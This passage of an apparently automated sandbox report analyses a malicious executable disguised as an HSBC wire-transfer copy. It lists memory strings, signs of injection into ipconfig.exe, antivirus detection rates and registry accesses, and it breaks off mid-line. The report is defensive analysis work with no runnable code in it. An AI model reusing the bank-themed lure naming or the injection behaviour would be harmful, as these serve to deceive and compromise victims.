          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_02C7A35A NtCreateFile
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000000.278790638.0000000000456000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameISectionEnt.exe. vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.293103917.0000000005CD0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.289914483.00000000028A1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.292767031.0000000005850000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000006.00000000.286928086.0000000000C76000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameISectionEnt.exe. vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346567819.000000000171F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346749422.00000000018AF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346869714.0000000001997000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exeBinary or memory string: OriginalFilenameISectionEnt.exe. vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: HSBC ... Wire Transfer Copy.exeVirustotal: Detection: 16%
          Source: HSBC ... Wire Transfer Copy.exeReversingLabs: Detection: 40%
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeFile read: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe:Zone.IdentifierJump to behavior
          Source: HSBC ... Wire Transfer Copy.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desk